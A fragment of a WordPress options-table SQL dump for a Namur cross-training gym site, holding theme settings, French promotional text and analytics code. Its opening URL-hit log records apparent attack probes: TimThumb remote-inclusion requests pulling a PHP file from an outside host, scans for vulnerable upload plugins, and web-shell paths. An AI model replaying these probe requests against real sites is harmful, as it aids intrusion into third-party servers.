Firefox/22.0\";}s:13:\"last_hit_time\";i:1414120634;}s:80:\"http://crosstrainingcenter.be/wp-content/uploads/wysija/themes/enrtzamp/exor.php\";a:5:{s:9:\"hit_count\";i:1;s:6:\"is_new\";b:1;s:8:\"referers\";a:1:{i:0;s:80:\"http://crosstrainingcenter.be/wp-content/uploads/wysija/themes/enrtzamp/exor.php\";}s:11:\"user_agents\";a:1:{i:0;s:81:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:22.0) Gecko/20100101 Firefox/22.0\";}s:13:\"last_hit_time\";i:1414120721;}s:124:\"http://www.crosstrainingcenter.be/wp-content/themes/figero/includes/thumb.php?src=http://wordpress.com.carizo.com.tr/tim.php\";a:5:{s:9:\"hit_count\";i:1;s:6:\"is_new\";b:1;s:8:\"referers\";a:0:{}s:11:\"user_agents\";a:1:{i:0;s:72:\"Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)\";}s:13:\"last_hit_time\";i:1416144000;}s:126:\"http://www.crosstrainingcenter.be/wp-content/themes/figero/classes/timthumb.php?src=http://wordpress.com.carizo.com.tr/tim.php\";a:5:{s:9:\"hit_count\";i:1;s:6:\"is_new\";b:1;s:8:\"referers\";a:0:{}s:11:\"user_agents\";a:1:{i:0;s:72:\"Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)\";}s:13:\"last_hit_time\";i:1416144002;}s:121:\"http://www.crosstrainingcenter.be/wp-content/themes/figero/themify/img.php?src=http://wordpress.com.carizo.com.tr/tim.php\";a:5:{s:9:\"hit_count\";i:1;s:6:\"is_new\";b:1;s:8:\"referers\";a:0:{}s:11:\"user_agents\";a:1:{i:0;s:72:\"Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)\";}s:13:\"last_hit_time\";i:1416144003;}s:86:\"http://www.crosstrainingcenter.be/wp-content/plugins/doptg/libraries/php/uploadify.swf\";a:5:{s:9:\"hit_count\";i:1;s:6:\"is_new\";b:1;s:8:\"referers\";a:1:{i:0;s:46:\"http://www.crosstrainingcenter.be/hello-world/\";}s:11:\"user_agents\";a:1:{i:0;s:105:\"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.3 (KHTML, like Gecko) Chrome/19.0.1061.1 Safari/536.3\";}s:13:\"last_hit_time\";i:1416698945;}s:78:\"http://www.crosstrainingcenter.be/wp-content/plugins/revslider/release_log.txt\";a:5:{s:9:\"hit_count\";i:4;s:6:\"is_new\";b:1;s:8:\"referers\";a:1:{i:0;s:74:\"http://crosstrainingcenter.be/wp-content/plugins/revslider/release_log.txt\";}s:11:\"user_agents\";a:2:{i:0;s:77:\"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0\";i:1;s:72:\"Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0\";}s:13:\"last_hit_time\";i:1438199672;}s:80:\"http://www.crosstrainingcenter.be/wp-content/plugins/download-manager/readme.txt\";a:5:{s:9:\"hit_count\";i:3;s:6:\"is_new\";b:1;s:8:\"referers\";a:2:{i:0;s:80:\"http://www.crosstrainingcenter.be/wp-content/plugins/download-manager/readme.txt\";i:1;s:76:\"http://crosstrainingcenter.be/wp-content/plugins/download-manager/readme.txt\";}s:11:\"user_agents\";a:2:{i:0;s:55:\"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\";i:1;s:77:\"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0\";}s:13:\"last_hit_time\";i:1418930158;}s:80:\"http://www.crosstrainingcenter.be/wp-content/uploads/wpcf7_captcha/229136119.png\";a:5:{s:9:\"hit_count\";i:1;s:6:\"is_new\";b:1;s:8:\"referers\";a:0:{}s:11:\"user_agents\";a:1:{i:0;s:64:\"Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)\";}s:13:\"last_hit_time\";i:1417716370;}s:81:\"http://www.crosstrainingcenter.be/wp-content/plugins/tweet-old-post/css/style.css\";a:5:{s:9:\"hit_count\";i:1;s:6:\"is_new\";b:1;s:8:\"referers\";a:1:{i:0;s:81:\"http://www.crosstrainingcenter.be/wp-content/plugins/tweet-old-post/css/style.css\";}s:11:\"user_agents\";a:1:{i:0;s:55:\"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\";}s:13:\"last_hit_time\";i:1417911711;}s:81:\"http://www.crosstrainingcenter.be/wp-content/uploads/wpcf7_captcha/1192236854.png\";a:5:{s:9:\"hit_count\";i:1;s:6:\"is_new\";b:1;s:8:\"referers\";a:0:{}s:11:\"user_agents\";a:1:{i:0;s:64:\"Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)\";}s:13:\"last_hit_time\";i:1417992942;}s:81:\"http://www.crosstrainingcenter.be/wp-content/uploads/wpcf7_captcha/1847734720.png\";a:5:{s:9:\"hit_count\";i:1;s:6:\"is_new\";b:1;s:8:\"referers\";a:0:{}s:11:\"user_agents\";a:1:{i:0;s:64:\"Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)\";}s:13:\"last_hit_time\";i:1418281468;}s:120:\"http://www.crosstrainingcenter.be/le-cross-training/+++++++++++++++++++++++++++++Result:+no+post+sending+forms+are+found\";a:5:{s:9:\"hit_count\";i:2;s:6:\"is_new\";b:1;s:8:\"referers\";a:1:{i:0;s:121:\"http://www.crosstrainingcenter.be/le-cross-training/+++++++++++++++++++++++++++++Result:+no+post+sending+forms+are+found;\";}s:11:\"user_agents\";a:2:{i:0;s:72:\"Mozilla/5.0 (Windows NT 6.3; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0\";i:1;s:109:\"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36\";}s:13:\"last_hit_time\";i:1418999995;}s:95:\"http://www.crosstrainingcenter.be/wp-content/plugins/shortcodes-ultimate/assets/css/sunrise.css\";a:5:{s:9:\"hit_count\";i:1;s:6:\"is_new\";b:1;s:8:\"referers\";a:1:{i:0;s:95:\"http://www.crosstrainingcenter.be/wp-content/plugins/shortcodes-ultimate/assets/css/sunrise.css\";}s:11:\"user_agents\";a:1:{i:0;s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:33.0) Gecko/20120101 Firefox/33.0\";}s:13:\"last_hit_time\";i:1418853136;}s:57:\"http://www.crosstrainingcenter.be/uploadify/uploadify.swf\";a:5:{s:9:\"hit_count\";i:1;s:6:\"is_new\";b:1;s:8:\"referers\";a:1:{i:0;s:57:\"http://www.crosstrainingcenter.be/uploadify/uploadify.swf\";}s:11:\"user_agents\";a:1:{i:0;s:55:\"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\";}s:13:\"last_hit_time\";i:1418984322;}s:67:\"http://www.crosstrainingcenter.be/mailto:infocrosstrainingcenter.be\";a:5:{s:9:\"hit_count\";i:1;s:6:\"is_new\";b:1;s:8:\"referers\";a:1:{i:0;s:64:\"http://crosstrainingcenter.be/mailto:info@crosstrainingcenter.be\";}s:11:\"user_agents\";a:1:{i:0;s:19:\"Go 1.1 package http\";}s:13:\"last_hit_time\";i:1418985557;}s:76:\"http://www.crosstrainingcenter.be/wp-content/plugins/wp-symposium/readme.txt\";a:5:{s:9:\"hit_count\";i:18;s:6:\"is_new\";b:1;s:8:\"referers\";a:3:{i:0;s:72:\"http://crosstrainingcenter.be/wp-content/plugins/wp-symposium/readme.txt\";i:1;s:76:\"http://www.crosstrainingcenter.be/wp-content/plugins/wp-symposium/readme.txt\";i:2;s:30:\"http://crosstrainingcenter.be/\";}s:11:\"user_agents\";a:6:{i:0;s:72:\"Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0\";i:1;s:72:\"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0\";i:2;s:109:\"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36\";i:3;s:109:\"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36\";i:4;s:117:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/602.4.8 (KHTML, like Gecko) Version/10.0.3 Safari/602.4.8\";i:5;s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36\";}s:13:\"last_hit_time\";i:1496224739;}s:82:\"http://crosstrainingcenter.be/wp-content/plugins/wp-symposium/server/php/index.php\";a:5:{s:9:\"hit_count\";i:1;s:6:\"is_new\";b:1;s:8:\"referers\";a:1:{i:0;s:82:\"http://crosstrainingcenter.be/wp-content/plugins/wp-symposium/server/php/index.php\";}s:11:\"user_agents\";a:1:{i:0;s:81:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:22.0) Gecko/20100101 Firefox/22.0\";}s:13:\"last_hit_time\";i:1419283301;}s:86:\"http://www.crosstrainingcenter.be/wp-content/plugins/wp-symposium/server/php/index.php\";a:5:{s:9:\"hit_count\";i:1;s:6:\"is_new\";b:1;s:8:\"referers\";a:1:{i:0;s:86:\"http://www.crosstrainingcenter.be/wp-content/plugins/wp-symposium/server/php/index.php\";}s:11:\"user_agents\";a:1:{i:0;s:81:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:22.0) Gecko/20100101 Firefox/22.0\";}s:13:\"last_hit_time\";i:1419304173;}s:104:\"http://www.crosstrainingcenter.be/wp-content/plugins/revslider/temp/update_extract/revslider/license.php\";a:5:{s:9:\"hit_count\";i:1;s:6:\"is_new\";b:1;s:8:\"referers\";a:1:{i:0;s:100:\"http://crosstrainingcenter.be/wp-content/plugins/revslider/temp/update_extract/revslider/license.php\";}s:11:\"user_agents\";a:1:{i:0;s:72:\"Mozilla/5.0 (Windows NT 6.3; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0\";}s:13:\"last_hit_time\";i:1419963696;}s:103:\"http://www.crosstrainingcenter.be/wp-content/plugins/revslider/temp/update_extract/revslider/__sprd.php\";a:5:{s:9:\"hit_count\";i:1;s:6:\"is_new\";b:1;s:8:\"referers\";a:1:{i:0;s:99:\"http://crosstrainingcenter.be/wp-content/plugins/revslider/temp/update_extract/revslider/__sprd.php\";}s:11:\"user_agents\";a:1:{i:0;s:72:\"Mozilla/5.0 (Windows NT 6.3; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0\";}s:13:\"last_hit_time\";i:1419963700;}s:75:\"http://www.crosstrainingcenter.be/wp-content/plugins/formcraft/css/demo.css\";a:5:{s:9:\"hit_count\";i:1;s:6:\"is_new\";b:1;s:8:\"referers\";a:1:{i:0;s:71:\"http://crosstrainingcenter.be/wp-content/plugins/formcraft/css/demo.css\";}s:11:\"user_agents\";a:1:{i:0;s:72:\"Mozilla/5.0 (Windows NT 6.3; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0\";}s:13:\"last_hit_time\";i:1420078079;}s:77:\"http://www.crosstrainingcenter.be/wp-content/plugins/cforms2/cforms-admin.css\";a:5:{s:9:\"hit_count\";i:3;s:6:\"is_new\";b:1;s:8:\"referers\";a:1:{i:0;s:73:\"http://crosstrainingcenter.be/wp-content/plugins/cforms2/cforms-admin.css\";}s:11:\"user_agents\";a:1:{i:0;s:55:\"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\";}s:13:\"last_hit_time\";i:1420215072;}s:47:\"http://www.crosstrainingcenter.be/wp-update.php\";a:5:{s:9:\"hit_count\";i:14;s:6:\"is_new\";b:1;s:8:\"referers\";a:2:{i:0;s:47:\"http://www.crosstrainingcenter.be/wp-update.php\";i:1;s:43:\"http://crosstrainingcenter.be/wp-update.php\";}s:11:\"user_agents\";a:2:{i:0;s:59:\"Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)\";i:1;s:55:\"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\";}s:13:\"last_hit_time\";i:1437076245;}s:63:\"http://www.crosstrainingcenter.be/wp-content/plugins/cforms/js/\";a:5:{s:9:\"hit_count\";i:1;s:6:\"is_new\";b:1;s:8:\"referers\";a:1:{i:0;s:63:\"http://www.crosstrainingcenter.be/wp-content/plugins/cforms/js/\";}s:11:\"user_agents\";a:1:{i:0;s:59:\"Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)\";}s:13:\"last_hit_time\";i:1420388491;}s:79:\"http://www.crosstrainingcenter.be/wp-content/plugins/cforms2/styling/cforms.css\";a:5:{s:9:\"hit_count\";i:1;s:6:\"is_new\";b:1;s:8:\"referers\";a:1:{i:0;s:75:\"http://crosstrainingcenter.be/wp-content/plugins/cforms2/styling/cforms.css\";}s:11:\"user_agents\";a:1:{i:0;s:72:\"Mozilla/5.0 (Windows NT 6.3; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0\";}s:13:\"last_hit_time\";i:1420450016;}s:91:\"http://www.crosstrainingcenter.be/wp-content/plugins/wp-easycart/inc/amfphp/administration/\";a:5:{s:9:\"hit_count\";i:1;s:6:\"is_new\";b:1;s:8:\"referers\";a:1:{i:0;s:91:\"http://www.crosstrainingcenter.be/wp-content/plugins/wp-easycart/inc/amfphp/administration/\";}s:11:\"user_agents\";a:1:{i:0;s:59:\"Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)\";}s:13:\"last_hit_time\";i:1420773962;}s:68:\"http://www.crosstrainingcenter.be/wp-content/uploads/2015/05/upl.php\";a:5:{s:9:\"hit_count\";i:1;s:6:\"is_new\";b:1;s:8:\"referers\";a:1:{i:0;s:22:\"http://www.google.com/\";}s:11:\"user_agents\";a:1:{i:0;s:112:\"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2896.3 Safari/537.36\";}s:13:\"last_hit_time\";i:1500435655;}}}', 'yes'),
(773, 'seo_ultimate_module_import-aiosp', 'a:3:{s:15:\"import_postmeta\";b:1;s:25:\"postmeta_bothexist_action\";s:4:\"skip\";s:17:\"after_post_import\";s:7:\"nothing\";}', 'yes'),
(774, 'seo_ultimate_module_user-code', 'a:1:{s:14:\"global_wp_head\";s:0:\"\";}', 'yes'),
(406, 'wop_options_field', 'a:2:{s:19:\"num_of_wop_sidebars\";s:0:\"\";s:10:\"wop_name_1\";s:8:\"objectif\";}', 'yes'),
(139, 'theme_mods_twentytwelve', 'a:1:{s:16:\"sidebars_widgets\";a:2:{s:4:\"time\";i:1369332468;s:4:\"data\";a:4:{s:19:\"wp_inactive_widgets\";a:0:{}s:9:\"sidebar-1\";a:6:{i:0;s:8:\"search-2\";i:1;s:14:\"recent-posts-2\";i:2;s:17:\"recent-comments-2\";i:3;s:10:\"archives-2\";i:4;s:12:\"categories-2\";i:5;s:6:\"meta-2\";}s:9:\"sidebar-2\";a:0:{}s:9:\"sidebar-3\";a:0:{}}}}', 'yes'),
(140, 'current_theme', 'Figero', 'yes'),
(141, 'theme_mods_figero', 'a:3:{i:0;b:0;s:18:\"nav_menu_locations\";a:1:{s:11:\"custom_menu\";i:2;}s:18:\"custom_css_post_id\";i:-1;}', 'yes'),
(142, 'theme_switched', '', 'yes');
INSERT INTO `wp_options` (`option_id`, `option_name`, `option_value`, `autoload`) VALUES
(143, 'figero_options', 'a:33:{s:11:\"of_template\";a:36:{i:0;a:2:{s:4:\"name\";s:16:\"General Settings\";s:4:\"type\";s:7:\"heading\";}i:1;a:4:{s:4:\"name\";s:11:\"Custom Logo\";s:4:\"desc\";s:61:\"Choose your own logo. Optimal Size: 170px Wide by 30px Height\";s:2:\"id\";s:11:\"figero_logo\";s:4:\"type\";s:6:\"upload\";}i:2;a:4:{s:4:\"name\";s:14:\"Custom Favicon\";s:4:\"desc\";s:71:\"Specify a 16px x 16px image that will represent your website\'s favicon.\";s:2:\"id\";s:14:\"figero_favicon\";s:4:\"type\";s:6:\"upload\";}i:3;a:5:{s:4:\"name\";s:20:\"Google Analytic Code\";s:4:\"desc\";s:58:\"Paste your Google Analytics (or other) tracking code here.\";s:2:\"id\";s:16:\"figero_analytics\";s:3:\"std\";s:0:\"\";s:4:\"type\";s:8:\"textarea\";}i:4;a:2:{s:4:\"name\";s:16:\"Top Feature Area\";s:4:\"type\";s:7:\"heading\";}i:5;a:5:{s:4:\"name\";s:15:\"Feature Heading\";s:4:\"desc\";s:17:\"Enter the Heading\";s:2:\"id\";s:20:\"figero_slideheading1\";s:3:\"std\";s:0:\"\";s:4:\"type\";s:8:\"textarea\";}i:6;a:5:{s:4:\"name\";s:19:\"Feature Description\";s:4:\"desc\";s:17:\"Enter description\";s:2:\"id\";s:24:\"figero_slidedescription1\";s:3:\"std\";s:0:\"\";s:4:\"type\";s:8:\"textarea\";}i:7;a:5:{s:4:\"name\";s:21:\"Text For First Button\";s:4:\"desc\";s:32:\"Enter the Text for First Button.\";s:2:\"id\";s:18:\"figero_slidel_rb_1\";s:3:\"std\";s:0:\"\";s:4:\"type\";s:4:\"text\";}i:8;a:5:{s:4:\"name\";s:21:\"Link For First Button\";s:4:\"desc\";s:36:\"Enter the Link URL for First Button.\";s:2:\"id\";s:17:\"figero_slidel_r_1\";s:3:\"std\";s:0:\"\";s:4:\"type\";s:4:\"text\";}i:9;a:5:{s:4:\"name\";s:22:\"Text For Second Button\";s:4:\"desc\";s:33:\"Enter the Text for Second Button.\";s:2:\"id\";s:18:\"figero_slidel_lb_1\";s:3:\"std\";s:0:\"\";s:4:\"type\";s:4:\"text\";}i:10;a:5:{s:4:\"name\";s:22:\"Link For Second Button\";s:4:\"desc\";s:37:\"Enter the Link URL for Second Button.\";s:2:\"id\";s:17:\"figero_slidel_l_1\";s:3:\"std\";s:0:\"\";s:4:\"type\";s:4:\"text\";}i:11;a:5:{s:4:\"name\";s:13:\"Feature Image\";s:4:\"desc\";s:67:\"Choose your image to your feature area. Optimal Size: 516px x 300px\";s:2:\"id\";s:18:\"figero_slideimage1\";s:3:\"std\";s:0:\"\";s:4:\"type\";s:6:\"upload\";}i:12;a:2:{s:4:\"name\";s:17:\"Homepage Two Cols\";s:4:\"type\";s:7:\"heading\";}i:13;a:5:{s:4:\"name\";s:19:\"Left Column Heading\";s:4:\"desc\";s:40:\"Enter your heading line for left column.\";s:2:\"id\";s:16:\"figero_headline1\";s:3:\"std\";s:0:\"\";s:4:\"type\";s:8:\"textarea\";}i:14;a:5:{s:4:\"name\";s:23:\"Left Column Description\";s:4:\"desc\";s:43:\"Enter your feature content for left column.\";s:2:\"id\";s:15:\"figero_feature1\";s:3:\"std\";s:0:\"\";s:4:\"type\";s:8:\"textarea\";}i:15;a:5:{s:4:\"name\";s:20:\"Right Column Heading\";s:4:\"desc\";s:41:\"Enter your heading line for right column.\";s:2:\"id\";s:16:\"figero_headline2\";s:3:\"std\";s:0:\"\";s:4:\"type\";s:8:\"textarea\";}i:16;a:5:{s:4:\"name\";s:18:\"Right Column Image\";s:4:\"desc\";s:38:\"Choose image for right column section.\";s:2:\"id\";s:19:\"figero_testo_image1\";s:3:\"std\";s:0:\"\";s:4:\"type\";s:6:\"upload\";}i:17;a:5:{s:4:\"name\";s:24:\"Right Column Description\";s:4:\"desc\";s:43:\"Enter description for right column section.\";s:2:\"id\";s:18:\"figero_testo_desc1\";s:3:\"std\";s:0:\"\";s:4:\"type\";s:8:\"textarea\";}i:18;a:2:{s:4:\"name\";s:25:\"Homepage Featured Section\";s:4:\"type\";s:7:\"heading\";}i:19;a:5:{s:4:\"name\";s:27:\"First Feature Section Image\";s:4:\"desc\";s:44:\"Choose your image for first feature section.\";s:2:\"id\";s:21:\"figero_featured_img_1\";s:3:\"std\";s:0:\"\";s:4:\"type\";s:6:\"upload\";}i:20;a:5:{s:4:\"name\";s:29:\"First Feature Section Heading\";s:4:\"desc\";s:50:\"Enter your text heading for first feature section.\";s:2:\"id\";s:19:\"figero_featured_h_1\";s:3:\"std\";s:0:\"\";s:4:\"type\";s:8:\"textarea\";}i:21;a:5:{s:4:\"name\";s:33:\"First Feature Section Description\";s:4:\"desc\";s:58:\"Enter your content for first feature section descriptions.\";s:2:\"id\";s:17:\"figero_featured_1\";s:3:\"std\";s:0:\"\";s:4:\"type\";s:8:\"textarea\";}i:22;a:3:{s:4:\"name\";s:23:\"Second Feature Section.\";s:4:\"type\";s:8:\"saperate\";s:5:\"class\";s:9:\"saperator\";}i:23;a:5:{s:4:\"name\";s:28:\"Second Feature Section Image\";s:4:\"desc\";s:45:\"Choose your image for second feature section.\";s:2:\"id\";s:21:\"figero_featured_img_2\";s:3:\"std\";s:0:\"\";s:4:\"type\";s:6:\"upload\";}i:24;a:5:{s:4:\"name\";s:30:\"Second Feature Section Heading\";s:4:\"desc\";s:51:\"Enter your text heading for second feature section.\";s:2:\"id\";s:19:\"figero_featured_h_2\";s:3:\"std\";s:0:\"\";s:4:\"type\";s:8:\"textarea\";}i:25;a:5:{s:4:\"name\";s:34:\"Second Feature Section Description\";s:4:\"desc\";s:59:\"Enter your content for second feature section descriptions.\";s:2:\"id\";s:17:\"figero_featured_2\";s:3:\"std\";s:0:\"\";s:4:\"type\";s:8:\"textarea\";}i:26;a:3:{s:4:\"name\";s:22:\"Third Feature Section.\";s:4:\"type\";s:8:\"saperate\";s:5:\"class\";s:9:\"saperator\";}i:27;a:5:{s:4:\"name\";s:27:\"Third Feature Section Image\";s:4:\"desc\";s:44:\"Choose your image for third feature section.\";s:2:\"id\";s:21:\"figero_featured_img_3\";s:3:\"std\";s:0:\"\";s:4:\"type\";s:6:\"upload\";}i:28;a:5:{s:4:\"name\";s:29:\"Third Feature Section Heading\";s:4:\"desc\";s:50:\"Enter your text heading for third feature section.\";s:2:\"id\";s:19:\"figero_featured_h_3\";s:3:\"std\";s:0:\"\";s:4:\"type\";s:8:\"textarea\";}i:29;a:5:{s:4:\"name\";s:33:\"Third Feature Section Description\";s:4:\"desc\";s:58:\"Enter your content for third feature section descriptions.\";s:2:\"id\";s:17:\"figero_featured_3\";s:3:\"std\";s:0:\"\";s:4:\"type\";s:8:\"textarea\";}i:30;a:3:{s:4:\"name\";s:23:\"Fourth Feature Section.\";s:4:\"type\";s:8:\"saperate\";s:5:\"class\";s:9:\"saperator\";}i:31;a:5:{s:4:\"name\";s:28:\"Fourth Feature Section Image\";s:4:\"desc\";s:45:\"Choose your image for fourth feature section.\";s:2:\"id\";s:21:\"figero_featured_img_4\";s:3:\"std\";s:0:\"\";s:4:\"type\";s:6:\"upload\";}i:32;a:5:{s:4:\"name\";s:30:\"Fourth Feature Section Heading\";s:4:\"desc\";s:51:\"Enter your text heading for fourth feature section.\";s:2:\"id\";s:19:\"figero_featured_h_4\";s:3:\"std\";s:0:\"\";s:4:\"type\";s:8:\"textarea\";}i:33;a:5:{s:4:\"name\";s:34:\"Fourth Feature Section Description\";s:4:\"desc\";s:59:\"Enter your content for fourth feature section descriptions.\";s:2:\"id\";s:17:\"figero_featured_4\";s:3:\"std\";s:0:\"\";s:4:\"type\";s:8:\"textarea\";}i:34;a:2:{s:4:\"name\";s:15:\"Styling Options\";s:4:\"type\";s:7:\"heading\";}i:35;a:5:{s:4:\"name\";s:10:\"Custom CSS\";s:4:\"desc\";s:62:\"Quickly add some CSS to your theme by adding it to this block.\";s:2:\"id\";s:16:\"figero_customcss\";s:3:\"std\";s:0:\"\";s:4:\"type\";s:8:\"textarea\";}}s:12:\"of_themename\";s:6:\"Figero\";s:12:\"of_shortname\";s:2:\"of\";s:11:\"figero_logo\";s:74:\"http://www.crosstrainingcenter.be/wp-content/uploads/2014/02/lm-coach2.png\";s:14:\"figero_favicon\";s:0:\"\";s:16:\"figero_analytics\";s:435:\"<script>\r\n  (function(i,s,o,g,r,a,m){i[\'GoogleAnalyticsObject\']=r;i[r]=i[r]||function(){\r\n  (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),\r\n  m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)\r\n  })(window,document,\'script\',\'//www.google-analytics.com/analytics.js\',\'ga\');\r\n\r\n  ga(\'create\', \'UA-42733144-1\', \'crosstrainingcenter.be\');\r\n  ga(\'send\', \'pageview\');\r\n\r\n</script>\";s:20:\"figero_slideheading1\";s:1:\" \";s:24:\"figero_slidedescription1\";s:247:\"Unique en Belgique, une nouvelle façon de faire du fitness. Venez découvrir notre salle de cross training à Namur. Chez nous, vous bénéficierez d’un encadrement professionnel et d’entrainements personnalisés pour atteindre vos objectifs.\";s:18:\"figero_slidel_rb_1\";s:15:\"Séance Booster\";s:17:\"figero_slidel_r_1\";s:46:\"http://www.crosstrainingcenter.be/?page_id=266\";s:18:\"figero_slidel_lb_1\";s:21:\"Réservation en ligne\";s:17:\"figero_slidel_l_1\";s:42:\"http://reservation.crosstrainingcenter.be/\";s:18:\"figero_slideimage1\";s:77:\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/silouhette62.png\";s:16:\"figero_headline1\";s:1:\" \";s:15:\"figero_feature1\";s:1492:\"<br>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; padding-right: 15px; text-align:justify; width: 50%; padding-bottom:30px\"><div class=\"objectif\">Un coaching personnel</div><br>Un coach vous suivra tout au long de vos séances pour vous proposer des exercices adaptés à votre niveau, vos objectifs et vos caractéristiques individuelles.<br><br><br></td>\r\n<td style=\"border: 0px; padding-left: 15px; text-align:justify; width: 50%;  padding-bottom:30px\"><div class=\"objectif\">Un encadrement professionnel</div><br>Notre équipe est composée de spécialistes issus du milieu de l’éducation physique, de la kinésithérapie, de la diététique et de la médecine.</td>\r\n</tr>\r\n<tr>\r\n<td style=\"border: 0px; padding-right: 15px; text-align:justify; width: 50%;  padding-bottom:30px\"><div class=\"objectif\">Des outils innovants</div><br>Fini le travail répétitif, monotone et peu efficace des salles de musculation. Grâce aux TRX, RIP Trainer, Kettlebel, … des outils funs, travaillez votre muscle de manière fonctionnelle et performante dans une ambiance conviviale. </td>\r\n<td style=\"border: 0px; padding-left: 15px; text-align:justify; width: 50%;  padding-bottom:30px\"><div class=\"objectif\">Une approche globale</div><br>Pour optimaliser le travail et  vous aider à atteindre vos objectifs, nous vous proposons d’intervenir sur 3 éléments importants : l’alimentation, l’activité physique et le stress.</td>\r\n</tr>\r\n</tbody>\r\n</table>\";s:16:\"figero_headline2\";s:0:\"\";s:18:\"figero_testo_desc1\";s:0:\"\";s:21:\"figero_featured_img_1\";s:0:\"\";s:19:\"figero_featured_h_1\";s:0:\"\";s:17:\"figero_featured_1\";s:0:\"\";s:0:\"\";s:0:\"\";s:21:\"figero_featured_img_2\";s:0:\"\";s:19:\"figero_featured_h_2\";s:0:\"\";s:17:\"figero_featured_2\";s:0:\"\";s:21:\"figero_featured_img_3\";s:0:\"\";s:19:\"figero_featured_h_3\";s:0:\"\";s:17:\"figero_featured_3\";s:0:\"\";s:21:\"figero_featured_img_4\";s:0:\"\";s:19:\"figero_featured_h_4\";s:0:\"\";s:17:\"figero_featured_4\";s:0:\"\";s:16:\"figero_customcss\";s:0:\"\";s:10:\"of_options\";a:29:{s:11:\"figero_logo\";s:0:\"\";s:14:\"figero_favicon\";s:0:\"\";s:16:\"figero_analytics\";s:0:\"\";s:20:\"figero_slideheading1\";s:0:\"\";s:24:\"figero_slidedescription1\";s:0:\"\";s:18:\"figero_slidel_rb_1\";s:0:\"\";s:17:\"figero_slidel_r_1\";s:0:\"\";s:18:\"figero_slidel_lb_1\";s:0:\"\";s:17:\"figero_slidel_l_1\";s:0:\"\";s:18:\"figero_slideimage1\";s:0:\"\";s:16:\"figero_headline1\";s:0:\"\";s:15:\"figero_feature1\";s:0:\"\";s:16:\"figero_headline2\";s:0:\"\";s:19:\"figero_testo_image1\";s:0:\"\";s:18:\"figero_testo_desc1\";s:0:\"\";s:21:\"figero_featured_img_1\";s:0:\"\";s:19:\"figero_featured_h_1\";s:0:\"\";s:17:\"figero_featured_1\";s:0:\"\";s:0:\"\";s:0:\"\";s:21:\"figero_featured_img_2\";s:0:\"\";s:19:\"figero_featured_h_2\";s:0:\"\";s:17:\"figero_featured_2\";s:0:\"\";s:21:\"figero_featured_img_3\";s:0:\"\";s:19:\"figero_featured_h_3\";s:0:\"\";s:17:\"figero_featured_3\";s:0:\"\";s:21:\"figero_featured_img_4\";s:0:\"\";s:19:\"figero_featured_h_4\";s:0:\"\";s:17:\"figero_featured_4\";s:0:\"\";s:16:\"figero_customcss\";s:0:\"\";}s:19:\"figero_testo_image1\";s:0:\"\";}', 'yes'),
(176, 'widget_pages', 'a:1:{s:12:\"_multiwidget\";i:1;}', 'yes'),
(144, 'of_options', 'a:0:{}', 'yes'),
(145, 'nav_menu_options', 'a:2:{i:0;b:0;s:8:\"auto_add\";a:0:{}}', 'yes'),
